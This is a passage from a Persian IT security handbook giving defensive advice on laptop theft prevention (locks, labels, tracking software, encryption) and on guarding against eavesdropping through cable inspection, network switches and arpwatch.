‫ﺑﻴﺸﺘﺮ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻛﻪ ﺍﻣﺮﻭﺯﻩ ﺑﻪ ﻓﺮﻭﺵ ﻣﻲﺭﺳﻨﺪ ﻣﺠﻬﺰ ﺑﻪ ﻳﻚ ﺷﻴﺎﺭ ﺍﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺑﺎ ﻗﻴﻤﺖ ﻛﻤﺘﺮ ﺍﺯ ‪ ۵۰‬ﺩﻻﺭ ﻣﻲﺗﻮﺍﻥ ﻳﻚ ﻗﻔـﻞ‬
‫ﻛﺎﺑﻠﻲ ﺧﺮﻳﺪ ﻛﻪ ﺷﻴﺎﺭ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪ ﻛﻴﻔﻲ ﺭﺍ ﺑﻪ ﺍﺷﻴﺎﺀ ﻧﺰﺩﻳﻚ ﺁﻥ ﻗﻔﻞ ﻣﻲﻛﻨﺪ‪ .‬ﺍﮔﺮ ﺩﺳﺘﮕﺎﻩ ﺑﻪ ﺟﺎﻳﻲ ﻗﻔﻞ ﺷﻮﺩ ﻧﻤﻲﺗـﻮﺍﻥ ﺑـﺪﻭﻥ ﺩﺍﺷـﺘﻦ‬
‫ﻛﻠﻴﺪ ﻳﺎ ﺁﺳﻴﺐ ﺭﺳﺎﻧﺪﻥ ﺑﻪ ﺩﺳﺘﮕﺎﻩ ﺁﻧﺮﺍ ﺑﺎﺯ ﻛﺮﺩ‪ ،‬ﻭ ﺩﺭﺻﻮﺭﺕ ﺁﺳﻴﺐ ﺩﻳﺪﻥ ﺭﺍﻳﺎﻧﻪ ﻫﻢ ﻓﺮﻭﺵ ﻣﺠﺪﺩ ﺁﻥ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺧﻮﺍﻫﺪ ﺷـﺪ‪ .‬ﺍﻳﻨﮕﻮﻧـﻪ‬
‫ﻗﻔﻠﻬﺎ ﺑﻴﺸﺘﺮ ﻣﺎﻧﻊ ﻗﺎﭘﻴﺪﻩ ﺷﺪﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﺗﻮﺳﻂ ﺩﺯﺩﻫﺎﻱ ﺧﻴﺎﺑﺎﻧﻲ ﻣﻲﺷﻮﻧﺪ‪.‬‬

‫ﺑﺮﭼﺴﺐﺯﺩﻥ‬
‫ﻳﻚ ﺭﺍﻩ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﺍﻣﻜﺎﻥ ﺳﺮﻗﺖ ﻭ ﺍﻓﺰﺍﻳﺶ ﺍﺣﺘﻤﺎﻝ ﺑﺎﺯﭘﺲ ﻓﺮﺳﺘﺎﺩﻥ ﺭﺍﻳﺎﻧﻪ ﻛﻴﻔﻲ‪ ،‬ﺣﻜﺎﻛﻲ ﻧﺎﻡ ﻭ ﺷﻤﺎﺭﻩ ﺗﻠﻔﻦ ﻳﺎ ﺑﺮﭼـﺴﺐ ﺯﺩﻥ‬
‫ﺭﻭﻱ ﺁﻥ ﺗﻮﺳﻂ ﺑﺮﭼﺴﺐﺯﻧﻬﺎﻱ ﺛﺎﺑﺖ ﻳﺎ ﻧﻴﻤﻪﺛﺎﺑﺖ ﺍﺳﺖ‪ .‬ﻭﺟﻮﺩ ﺍﻳﻦ ﺑﺮﭼﺴﺒﻬﺎ‪ ،‬ﺍﺩﻋﺎﻱ ﻋﺪﻡ ﺍﻃﻼﻉ ﺧﺮﻳﺪﺍﺭﺍﻥ ﻳـﺎ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺍﺯ ﻣـﺴﺮﻭﻗﻪ‬
‫ﺑﻮﺩﻥ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﺴﻴﺎﺭ ﺳﺨﺖ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺑﺮﭼﺴﺒﻬﺎﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺮﭼﺴﺐﺯﻧﻲ ﺧﻮﺏ ﺑﻪ ﻭﺿﻮﺡ ﻗﺎﺑﻞ ﺭﺅﻳﺖ ﻫﺴﺘﻨﺪ ﻭ ﺷﻤﺎﺭﺓ ﺳﺮﻱ ﺍﺧﺘﺼﺎﺻﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻮﺟﺐ ﻣﻲﺷـﻮﺩ ﺳـﺎﺯﻣﺎﻥ‬
‫ﺑﺘﻮﺍﻧﺪ ﻣﺸﺨﺼﺎﺕ ﺁﻧﺮﺍ ﺭﺩﻳﺎﺑﻲ ﻛﻨﺪ‪ .‬ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺮﭼﺴﺐﮔﺬﺍﺭﻱ ﻛﻢﻫﺰﻳﻨﻪ ﺑﻮﺳﻴﻠﺔ ﺷﺮﻛﺖ ﺭﺩﻳﺎﺑﻲ ﺍﻣﻦ ﻭﺳﺎﻳﻞ ﺩﻓﺘـﺮﻱ )‪ ٥٨(STOP‬ﺗﻮﻟﻴـﺪ‬
‫ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺑﻪ ﺍﻳﻦ ﺑﺮﭼﺴﺒﻬﺎ ﺷﻤﺎﺭﺓ ﺳﺮﻱ ﺍﺧﺘﺼﺎﺻﻲ ﺗﻌﻠﻖ ﮔﺮﻓﺘﻪ ﻭ ﺑﺎ ﭘﺸﺘﻴﺒﺎﻧﻲ ‪ ۳‬ﺳﺎﻟﻪ ﺩﺭ ﺍﺭﻭﭘﺎ‪ ،‬ﺍﺳﺘﺮﺍﻟﻴﺎ‪ ،‬ﺁﻣﺮﻳﻜﺎﻱ ﻻﺗـﻴﻦ‪ ،‬ﻭ ﺁﻣﺮﻳﻜـﺎﻱ‬
‫ﺷﻤﺎﻟﻲ ﻫﻤﺮﺍﻩ ﺍﺳﺖ‪ .‬ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﻗﻄﻌﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺑﺎ ﺑﺮﭼﺴﺐ ‪ STOP‬ﭘﻴﺪﺍ ﺷﻮﺩ‪ ،‬ﺷﺮﻛﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺗﺮﺗﻴﺒﻲ ﺑﺪﻫﺪ ﻛـﻪ ﺑـﻪ ﻣﺎﻟـﻚ ﺍﺻـﻠﻲ‬
‫ﺑﺎﺯﮔﺸﺖ ﺩﺍﺩﻩ ﺷﻮﺩ‪.‬‬

‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺧﺪﻣﺎﺕ ﺗﺮﻣﻴﻢ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ‬


‫ﺍﻣﺮﻭﺯﻩ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﺑﺮﺍﻱ "ﺭﺩﻳﺎﺑﻲ" ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺑﻪ ﻓﺮﻭﺵ ﻣﻲﺭﺳﺎﻧﻨﺪ‪ .‬ﺑﺮﻧﺎﻣﺔ ﺭﺩﻳـﺎﺑﻲ ﺩﺭ ﻗـﺴﻤﺘﻬﺎﻱ ﻣﺨﺘﻠـﻒ‬
‫ﺭﺍﻳﺎﻧﺔ ﻛﻴﻔﻲ ﭘﻨﻬﺎﻥ ﻣﻲﺷﻮﺩ ﻭ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﻳﻚ ﺗﻤﺎﺱ ﺑﺎ ﺳﺮﻭﻳﺲ ﺭﺩﻳﺎﺑﻲ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﺪ ﺗﺎ ﻣﺤﻞ ﺧﻮﺩ ﺭﺍ ﺍﻋﻼﻡ ﻛﻨﺪ‪ .‬ﺍﻳﻦ ﺗﻤﺎﺱ ﻣﻤﻜﻦ‬

‫‪58‬‬ ‫)‪Secure Tracking of Office Property (http://www.stoptheft.com‬‬


‫‪٢٨٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻻ ﺍﺯ ﺍﻳﻦ ﺗﻤﺎﺳﻬﺎ ﺻﺮﻓﻨﻈﺮ ﻣﻲﺷﻮﺩ‪ ،‬ﺍﻣـﺎ ﭼﻨﺎﻧﭽـﻪ ﺭﺍﻳﺎﻧـﻪ ﻛﻴﻔـﻲ ﺩﺭ‬


‫ﺍﺳﺖ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺧﻂ ﺗﻠﻔﻦ ﻭ ﻳﺎ ﻳﻚ ﺍﺗﺼﺎﻝ ﺷﺒﻜﻪ ﺑﺎﺷﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻣﺮﻛﺰ ﺳﺮﻭﻳﺲ ﺭﺩﻳﺎﺑﻲ ﺑﻌﻨﻮﺍﻥ "ﺩﺯﺩﻳﺪﻩﺷﺪﻩ" ﺑﻪ ﺛﺒﺖ ﺭﺳﻴﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﭘﻠﻴﺲ ﺩﺭ ﺟﺮﻳﺎﻥ ﻣﺤﻞ ﻣﺤﻤﻮﻟﻪ ﺩﺯﺩﻱ ﻗﺮﺍﺭ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ‪.‬‬
‫ﺍﻟﺒﺘﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺭﻭﻣﻴﺰﻱ ﻫﻢ ﻣﺜـﻞ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻛﻴﻔـﻲ ﻛـﺎﺭ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺷـﻤﺎ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻴﺪ ﻣﺨﺎﻃﺮﺓ ﺑﺎﻻﻳﻲ ﺑﺮﺍﻱ ﺩﺯﺩﻳﺪﻩﺷﺪﻥ ﺩﺍﺭﻧﺪ ﺑﺪﻳﻨﺼﻮﺭﺕ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﺪ‪.‬‬

‫ﺳﺮﻗﺖ ﺍﺟﺰﺍﺀ‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﻗﻴﻤﺖ ‪ RAM‬ﺑﺎﻻ ﺑﻮﺩ ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻭ ﺩﺍﻧـﺸﮕﺎﻫﻬﺎ ﺍﺯ ﺩﺯﺩﻳﻬـﺎﻱ ﻣﺘـﻮﺍﻟﻲ ‪ RAM‬ﺭﻧـﺞ ﻣـﻲﺑﺮﺩﻧـﺪ‪ .‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺷـﺮﻛﺘﻬﺎ ﻭ‬
‫ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺷﺎﻫﺪ ﺩﺯﺩﻳﻬﺎﻱ ﺑﺰﺭﮒ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ ﭘﻴﺸﺮﻓﺘﻪ ﺑﻮﺩﻩﺍﻧﺪ‪ RAM .‬ﻭ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ ﺁﺧﺮﻳﻦ ﻣـﺪﻝ ﺑﺮﺍﺣﺘـﻲ ﺩﺭ ﺑـﺎﺯﺍﺭ‬
‫ﺁﺯﺍﺩ ﺑﻪ ﻓﺮﻭﺵ ﻣﻲﺭﺳﻨﺪ‪ .‬ﺍﻳﻦ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎ ﻏﻴﺮﻗﺎﺑﻞ ﺭﺩﻳﺎﺑﻲ ﻫﺴﺘﻨﺪ ﻭ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺳﺎﺭﻗﻴﻦ ﺗﻨﻬـﺎ ﻗـﺴﻤﺘﻲ ﺍﺯ ‪ RAM‬ﺩﺍﺧـﻞ ﻳـﻚ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ‬
‫ﻣﻲﺩﺯﺩﻧﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﻔﺘﻪﻫﺎ ﻳﺎ ﻣﺎﻫﻬﺎ ﺑﮕﺬﺭﺩ ﺗﺎ ﻣﻮﺿﻮﻉ ﺁﺷﻜﺎﺭ ﺷﻮﺩ‪ .‬ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﻛﺎﺭﺑﺮ ﺷﻜﺎﻳﺖ ﻛﻨﺪ ﻛﻪ ﻳـﻚ ﺭﺍﻳﺎﻧـﻪ ﻧﺎﮔﻬـﺎﻥ ﺑـﺴﻴﺎﺭ‬
‫ﺁﻫﺴﺘﻪﺗﺮ ﺍﺯ ﺁﻧﭽﻪ ﺩﻳﺮﻭﺯ ﻛﺎﺭ ﻣﻲﻛﺮﺩ ﻛﺎﺭ ﻣﻲﻛﻨﺪ‪ RAM ،‬ﺁﻧﺮﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ﺁﻳـﺎ ‪ case‬ﺁﻥ ﺍﺯ ﺍﻳﻤﻨـﻲ ﻓﻴﺰﻳﻜـﻲ‬
‫ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ﻳﺎ ﻧﻪ‪.‬‬

‫ﺭﻣﺰﮔﺬﺍﺭﻱ‬
‫ﺍﮔﺮ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪ ﺑﺎﺷﺪ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺭﻭﻱ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﺩﺭ ﺭﺍﺳﺘﺎﻱ ﺑﺮﺁﻭﺭﺩﻩ ﺷﺪﻥ ﺍﻫﺪﺍﻑ ﺻﺎﺣﺐ ﺟﺪﻳﺪ ﺭﺍﻳﺎﻧﻪ ﺑﻜﺎﺭ ﺧﻮﺍﻫـﺪ‬
‫ﺭﻓﺖ‪ .‬ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﭘﺎﻙ ﻛﻨﻨﺪ ﻳﺎ ﺁﻧﺮﺍ ﺑﺨﻮﺍﻧﻨﺪ‪ .‬ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻓﺮﻭﺵ ﺑﺮﺳﺪ‪ ،‬ﻳﺎ ﺩﺭ ﻧﺎﻣـﻪﭘﺮﺍﻛﻨـﻲﻫـﺎﻱ‬
‫ﺑﺪﻧﺎﻡ ﻛﻨﻨﺪﻩ ﻭ ﻳﺎ ﺩﺭ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﺎﻳﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻜﺎﺭ ﺭﻭﺩ‪.‬‬
‫ﻼ ﺩﻭﺭ ﻧﮕﻪ ﺩﺍﺷﺖ ﺍﻣﺎ ﻣﻲﺗﻮﺍﻥ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪ ﺭﺍ ﺗﻘﺮﻳﺒﹰﺎ ﺑﻲﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ؛ ﺑﺮﺍﻱ ﺍﻳـﻦ‬‫ﻫﻴﭽﮕﺎﻩ ﻧﻤﻲﺗﻮﺍﻥ ﭼﻴﺰﻱ ﺭﺍ ﺍﺯ ﺳﺮﻗﺖ ﻛﺎﻣ ﹰ‬
‫ﻣﻨﻈﻮﺭ ﮐﺎﻓﻲ ﺍﺳﺖ ﺩﺳﺘﮕﺎﻩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺑﺎﺷﺪ ﻭ ﺳﺎﺭﻕ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍ ﻧﺪﺍﻧﺪ‪ .‬ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ‪ ،‬ﺣﺘﻲ ﺑﺎ ﺑﻬﺘـﺮﻳﻦ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ ﺍﻣﻨﻴـﺖ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺑﺎﺯﺩﺍﺭﻧﺪﻩﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﺑﺎﻳﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻧﻈﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻪ ﺷﻜﺴﺘﻦ ﺁﻥ ﻣـﺸﻜﻞ ﺑﺎﺷـﺪ ﺭﻣﺰﮔـﺬﺍﺭﻱ‬
‫ﺷﻮﻧﺪ‪ .‬ﺗﻮﺻﻴﻪ ﻣﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻗﻮﻱ ﺍﺳﺖ ﺗﺎ ﺣﺘﻲ ﺍﮔﺮ ﺭﺍﻳﺎﻧﻪﺗﺎﻥ ﺑﻪ ﺳـﺮﻗﺖ ﺭﻓـﺖ‪ ،‬ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺳﻲ ﻛـﻪ ﺩﺭ ﺁﻥ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﺮﺍﺣﺘﻲ ﻣﻮﺭﺩ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺳﻮﺀ ﻭﺍﻗﻊ ﻧﺸﻮﺩ‪.‬‬

‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ‬
‫ﻫﻤﭙﻮﺷﺎﻧﻲ ﺯﻳﺎﺩﻱ ﻣﻴﺎﻥ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﺩﺍﺩﻩﻫﺎﻳﺘـﺎﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﺯ ﻫﻤـﺔ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺍﻳﻨﻬﺎ ﮔﺬﺷﺘﻪ ﺍﮔﺮ ﻛﺴﻲ ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ ﺭﺍ ﺑﺪﺯﺩﺩ ﻃﺒﻴﻌﺘﹰﺎ ﺩﺍﺩﻩﻫﺎﻱ ﺁﻧـﺮﺍ ﻧﻴـﺰ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺭﺩ‪ .‬ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺩﺍﺩﻩﻫـﺎﻱ ﺷـﻤﺎ ﺩﺭ ﻣﻌـﺮﺽ ﺣﻤـﻼﺕ‬
‫ﮔﻮﻧﺎﮔﻮﻧﻲ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻗﺪﺍﻣﺎﺕ ﻓﻴﺰﻳﻜﻲ ﻛﻪ ﺩﺭ ﻗﺴﻤﺘﻬﺎﻱ ﻗﺒﻠﻲ ﺑﻪ ﺁﻧﻬﺎ ﺍﺷﺎﺭﻩ ﺷﺪ ﺭﺍ ﺑﻲﺍﺛﺮ ﻛﻨﻨﺪ‪.‬‬

‫ﺍﺳﺘﺮﺍﻕﺳﻤﻊ )ﺷﻨﻮﺩ(‬
‫ﺷﺎﻳﺪ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﻜﻲ ﺍﺯ ﺷﻮﻡﺗﺮﻳﻦ ﺍﻧﻮﺍﻉ ﺍﻧﺘﺸﺎﺭ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺩﺍﺩﻩﻫﺎ ﺑﺎﺷﺪ‪ .‬ﺣﺘﻲ ﺑﺎ ﻣﻌﻤـﻮﻟﻲﺗـﺮﻳﻦ ﺗﺠﻬﻴـﺰﺍﺕ‪ ،‬ﺍﺳـﺘﺮﺍﻕﺳـﻤﻊ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺭﻭﻧﻮﺷﺖ ﻛﺎﻣﻞ ﺍﺯ ﺍﻗﺪﺍﻣﺎﺕ ﻗﺮﺑﺎﻧﻲ ‪ -‬ﻓﺸﺮﺩﻩﺷﺪﻥ ﻫﺮ ﺩﻛﻤﻪ ﺭﻭﻱ ﺻﻔﺤﻪﻛﻠﻴـﺪ ﻭ ﻫـﺮ ﻗﻄﻌـﻪ ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ ﺭﻭﻱ ﺻـﻔﺤﺔ‬
‫ﻻ ﻗﺮﺑـﺎﻧﻲ ﺍﺯ ﺣـﻀﻮﺭ ﻣﻬـﺎﺟﻢ‬
‫ﻧﻤﺎﻳﺸﮕﺮ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﻣﻲﺁﻳﺪ ﻳﺎ ﺑﻪ ﭼﺎﭘﮕﺮ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﺩ ‪ -‬ﺭﺍ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻛﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﻴـﺎﻥ ﻣﻌﻤـﻮ ﹰ‬
‫ﺑﻲﺍﻃﻼﻉ ﺍﺳﺖ ﻭ ﺧﻮﺵﺑﺎﻭﺭﺍﻧﻪ ﺑﻪ ﻛﺎﺭ ﺧﻮﺩ ﻣﻲﭘﺮﺩﺍﺯﺩ ﻭ ﻧﻪ ﺗﻨﻬﺎ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﺑﻠﻜﻪ ﻫﻤﭽﻨﻴﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻭ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﻣﺨﺘﻠـﻒ‬
‫ﻛﺴﺐ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﻣﻌﺮﺽ ﺳﺮﻗﺖ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٨٨‬‬

‫ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺩﺭ ﻧﻘﺎﻁ ﻣﺨﺘﻠﻒ ﺭﺍﻳﺎﻧﻪ ‪ -‬ﺍﺗﺼﺎﻝ ﻣﻴﺎﻥ ﺻﻔﺤﻪﻛﻠﻴﺪ ﻭ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﻛﺎﺑﻠﻬﺎ ﻭ ﺳﻴﻢﻛﺸﻲﻫـﺎﻱ ﺩﺍﺩﻩﻫـﺎ‪ ،‬ﺷـﺒﻜﻪﻫـﺎﻱ‬
‫‪ Ethernet‬ﻭ ﻓﻴﺒﺮﻧﻮﺭﻱ‪ ،‬ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ‪ ،‬ﻭ ﺣﺘﻲ ﺍﻣﻮﺍﺝ ﺭﺍﺩﻳﻮﻳﻲ ﮔﺬﺭﻧﺪﻩ ﺍﺯ ﺗﺠﻬﻴﺰﺍﺕ ‪ -‬ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ .‬ﺭﻭﺷﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ ﺩﺷـﻮﺍﺭ‬
‫ﻛﺮﺩﻥ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫ﻛﺎﺑﻠﻬﺎ ﻭ ﺳﻴﻤﻬﺎﻱ ﺣﺎﻣﻞ ﺩﺍﺩﻩ ﺭﺍ ﺍﺯ ﻧﻈﺮ ﺧﺮﺍﺑﻲ ﻳﺎ ﺗﻐﻴﻴﺮﺍﺕ ﻓﻴﺰﻳﻜﻲ ﺑﻪ ﻃﻮﺭ ﻣﻨﻈﻢ ﺑﺎﺯﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺎﺑـﻞ ﭘﻮﺷـﺶﺩﺍﺭ ﻳـﺎ‬ ‫•‬
‫ﻣﺴﻠﺢ ﺑﺮﺍﻱ ﺩﺷﻮﺍﺭﺗﺮ ﻛﺮﺩﻥ ﺍﻳﺠﺎﺩ ﻣﻨﻔﺬ ﺩﺭ ﺳﻴﻤﻬﺎ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺍﮔﺮ ﺑﻪ ﺍﺻﻮﻝ ﺍﻣﻨﻴﺘﻲ ﺧﻴﻠﻲ ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﻴﺪ‪ ،‬ﻛﺎﺑﻠﻬـﺎ ﺭﺍ‬
‫ﺩﺭ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻓﻮﻻﺩﻱ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺩﻓﺎﺗﺮ ﻏﻴﺮ ﻓﻌـﺎﻝ‪ ،‬ﭘﻮﺭﺗﻬـﺎﻱ ‪ Ethernet‬ﻓﻌـﺎﻝ ﻧﺪﺍﺭﻧـﺪ‪ .‬ﺑﺠـﺎﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ‪hub‬ﻫـﺎﻱ ‪ ،Ethernet‬ﺍﺯ‬ ‫•‬
‫‪٥٩‬‬
‫ﺳﻮﺋﻴﭽﻬﺎﻱ ‪ Ethernet‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺍﺯ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻛﻨﺘﺮﻝ ﺷﺒﮑﺔ ﻣﺤﻠﻲ ﻣﺎﻧﻨﺪ ‪ arpwatch‬ﻛﻪ ﺑﺴﺘﻪﻫﺎﻱ ﺑﺎ ﺁﺩﺭﺱ ‪MAC‬‬
‫ﺑﺪﻭﻥ ﺳﺎﺑﻘﺔ ﻗﺒﻠﻲ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﻛﻨﺪ‪ ،‬ﻳﺎ ﺍﺯ ﺳﻮﺋﻴﭽﻬﺎﻳﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮ ﺍﺳﺎﺱ ﺁﺩﺭﺱ ‪ MAC‬ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﻏﺮﺑـﺎﻝ ﻛﻨﻨـﺪ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻧﻤﺎﻳﻴﺪ‪ .‬ﻫﺮﺟﺎ ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺑﺠﺎﻱ ﻛﺎﺑﻠﻬﺎﻱ ﻣﺴﻲ‪ ،‬ﺍﺯ ﻛﺎﺑﻠﻬﺎﻱ ﻓﻴﺒﺮ ﻧﻮﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ؛ ﭼﻮﻥ ﺍﻳﺠﺎﺩ ﻣﻨﻔﺬ ﻣﺨﻔـﻲ ﺩﺭ ﺁﻧﻬـﺎ ﻣـﺸﻜﻠﺘﺮ‬
‫ﺍﺳﺖ‪.‬‬
